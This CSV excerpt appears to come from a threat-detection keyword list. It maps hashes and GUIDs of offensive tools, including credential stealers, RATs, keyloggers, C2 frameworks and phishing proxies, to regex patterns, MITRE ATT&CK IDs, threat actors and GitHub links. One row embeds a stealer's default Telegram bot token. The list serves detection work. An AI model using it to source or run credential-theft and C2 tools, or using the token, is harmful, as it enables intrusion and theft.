"*711ec8068cab80239b91cec707e3f811806aaee6758a536eabd0548d9a53d1a9*",".{0,1000}711ec8068cab80239b91cec707e3f811806aaee6758a536eabd0548d9a53d1a9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28814"
"*71257aa853990279a1801d95495b3fd05c5b9b15d4983289d41f947003c8bce6*",".{0,1000}71257aa853990279a1801d95495b3fd05c5b9b15d4983289d41f947003c8bce6.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","28815"
"*7133a7bae7094a163a75a072f6859a89b54326a111b86af5084fb88206bb89a1*",".{0,1000}7133a7bae7094a163a75a072f6859a89b54326a111b86af5084fb88206bb89a1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28816"
"*713490eff933ebcb0ce0bde4429f3ae4cee69cb4663d5172c2242738f97f5a4d*",".{0,1000}713490eff933ebcb0ce0bde4429f3ae4cee69cb4663d5172c2242738f97f5a4d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28817"
"*713724C3-2367-49FA-B03F-AB4B336FB405*",".{0,1000}713724C3\-2367\-49FA\-B03F\-AB4B336FB405.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","0","#GUIDproject","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","28818"
"*713c7d03ee5e75b2cacae76a91418ce7855faf39c485f97aed1e277bab87de47*",".{0,1000}713c7d03ee5e75b2cacae76a91418ce7855faf39c485f97aed1e277bab87de47.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","28819"
"*71461ca71bcebb5fefa9394fe8e9a5a47c102195064d1f4cb5f24d330c9be97d*",".{0,1000}71461ca71bcebb5fefa9394fe8e9a5a47c102195064d1f4cb5f24d330c9be97d.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","28821"
"*7148724805f706f8da206b24e03f2f6381bb9bc6959bbf51b6414ea8903caddd*",".{0,1000}7148724805f706f8da206b24e03f2f6381bb9bc6959bbf51b6414ea8903caddd.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28822"
"*714f969a0a24c346dda4c22eca5536e3d86f7137e64388af7c54e3b11db499ac*",".{0,1000}714f969a0a24c346dda4c22eca5536e3d86f7137e64388af7c54e3b11db499ac.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28823"
"*714f984be43793682fc8edb7c9865bf864c8051d83aa08d197c5c0bd7d96348f*",".{0,1000}714f984be43793682fc8edb7c9865bf864c8051d83aa08d197c5c0bd7d96348f.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","28824"
"*7151e9f573e106dd3cf0b0741ce31a0247a8a2fc7e3e3ed6860a7aa836376958*",".{0,1000}7151e9f573e106dd3cf0b0741ce31a0247a8a2fc7e3e3ed6860a7aa836376958.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28825"
"*7154bfcd36cdab9e802830e9bf01f34f87fe905919e669ccdb620bb5dc9bc90b*",".{0,1000}7154bfcd36cdab9e802830e9bf01f34f87fe905919e669ccdb620bb5dc9bc90b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28826"
"*716066f05bcc12159c8f0d16846f924b928c75cbae2eb36f9b96b2d8f770cb54*",".{0,1000}716066f05bcc12159c8f0d16846f924b928c75cbae2eb36f9b96b2d8f770cb54.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28827"
"*716ba53b9245b9f98cd68f191e20451f7a6d54864486051e8ce1f08132df97e4*",".{0,1000}716ba53b9245b9f98cd68f191e20451f7a6d54864486051e8ce1f08132df97e4.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28828"
"*716f0192964bd6c83ec16d8c12ff0e6a3e93d34dcb50c340412e5b63329c214a*",".{0,1000}716f0192964bd6c83ec16d8c12ff0e6a3e93d34dcb50c340412e5b63329c214a.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","28829"
"*7186796941:AAHmCxfhfQvNwDAtlvAmGY-N9c5sFXhHpNM*",".{0,1000}7186796941\:AAHmCxfhfQvNwDAtlvAmGY\-N9c5sFXhHpNM.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","default telegram secrets","10","","N/A","","","","28833"
"*7187c30cc73eeed90f61f91911272ae2868636667dfb30862b54aafb4164794a*",".{0,1000}7187c30cc73eeed90f61f91911272ae2868636667dfb30862b54aafb4164794a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28834"
"*719959af4f0b5b90acacae460e0965e6181766a60a27f536bfae473121a51ff9*",".{0,1000}719959af4f0b5b90acacae460e0965e6181766a60a27f536bfae473121a51ff9.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28838"
"*71a4456ea5aa14b3799672c2b57a2629a2ed5e0f3183a06bf9e3464d99b3941a*",".{0,1000}71a4456ea5aa14b3799672c2b57a2629a2ed5e0f3183a06bf9e3464d99b3941a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28841"
"*71ad700e300bf6b1bb195321b47a176bb9fe5b20298e5d70bf0a682e1b312712*",".{0,1000}71ad700e300bf6b1bb195321b47a176bb9fe5b20298e5d70bf0a682e1b312712.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28843"
"*71b7bfe3654793f6184c576c0e50df3ffef5f1e1930db72c46e96e756e9d9680*",".{0,1000}71b7bfe3654793f6184c576c0e50df3ffef5f1e1930db72c46e96e756e9d9680.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28846"
"*71b9c3db10f12ee563c0668b04171ca99e79ab1cd09911bc79f061d6d3da544d*",".{0,1000}71b9c3db10f12ee563c0668b04171ca99e79ab1cd09911bc79f061d6d3da544d.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","#filehash","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","28847"
"*71bda8ea-08bc-4ab1-9b40-614b167beb64*",".{0,1000}71bda8ea\-08bc\-4ab1\-9b40\-614b167beb64.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#GUIDproject","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","28848"
"*71bf606f92142a5dcbddd46e0c4877b96cd733ee0784d652b371a5450dff3f45*",".{0,1000}71bf606f92142a5dcbddd46e0c4877b96cd733ee0784d652b371a5450dff3f45.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28850"
"*71d8d1a4ae71b316caf1fae383f7f44aa55d4375c4a0ce08c74ba649251af73a*",".{0,1000}71d8d1a4ae71b316caf1fae383f7f44aa55d4375c4a0ce08c74ba649251af73a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28853"
"*71da0d5262e6fdc248d1e1a9de2ea99d4ebf6f3bf629dfda1cc356e60669e64b*",".{0,1000}71da0d5262e6fdc248d1e1a9de2ea99d4ebf6f3bf629dfda1cc356e60669e64b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28855"
"*71db9ab725d24be869c01d97f1557548766eb06d0bd2891557d6388628f9ada6*",".{0,1000}71db9ab725d24be869c01d97f1557548766eb06d0bd2891557d6388628f9ada6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28856"
"*71dd1a83975bb7020d3286003f6e0caa21f744f6b9ac77199e59ac5900a957c1*",".{0,1000}71dd1a83975bb7020d3286003f6e0caa21f744f6b9ac77199e59ac5900a957c1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28857"
"*71e371c38e27f1f755a04b2cc3bbe1725c1af2d8d517e96d1702a57e594ba27b*",".{0,1000}71e371c38e27f1f755a04b2cc3bbe1725c1af2d8d517e96d1702a57e594ba27b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28859"
"*71e42659e0e9e225d76c33796093aaf32bc1f29359a6f8a4105b6e07c1c10df6*",".{0,1000}71e42659e0e9e225d76c33796093aaf32bc1f29359a6f8a4105b6e07c1c10df6.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","28860"
"*71eb55cc0de1ddeff8b130ab5744a895f30fbc1b58b4a6d12741311415234ad3*",".{0,1000}71eb55cc0de1ddeff8b130ab5744a895f30fbc1b58b4a6d12741311415234ad3.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28861"
"*71f693cce010e95145ada158a6ec7e7b1b9902f222dc53d9d54bee4d75031951*",".{0,1000}71f693cce010e95145ada158a6ec7e7b1b9902f222dc53d9d54bee4d75031951.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28862"
"*7202dbae30292ab2e370ff0fbcb4cdb5ef765e1e290968f7222d65c24e4645ba*",".{0,1000}7202dbae30292ab2e370ff0fbcb4cdb5ef765e1e290968f7222d65c24e4645ba.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","28864"
"*7212755666c85ed4416a5ed2f317777d7fbf6cb65f42041949272fd3518a7566*",".{0,1000}7212755666c85ed4416a5ed2f317777d7fbf6cb65f42041949272fd3518a7566.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","28866"
"*72147820461101ca9687ef5177cafad482953946d1b93c54c1cfc69a953496ae*",".{0,1000}72147820461101ca9687ef5177cafad482953946d1b93c54c1cfc69a953496ae.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","28867"
"*7215dd73a9efcd1f85066a3d6d496a80cad0911b409847b524d4111e520c5d1a*",".{0,1000}7215dd73a9efcd1f85066a3d6d496a80cad0911b409847b524d4111e520c5d1a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28869"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28870"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28871"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28872"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28873"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28874"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28875"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28876"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28877"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28878"
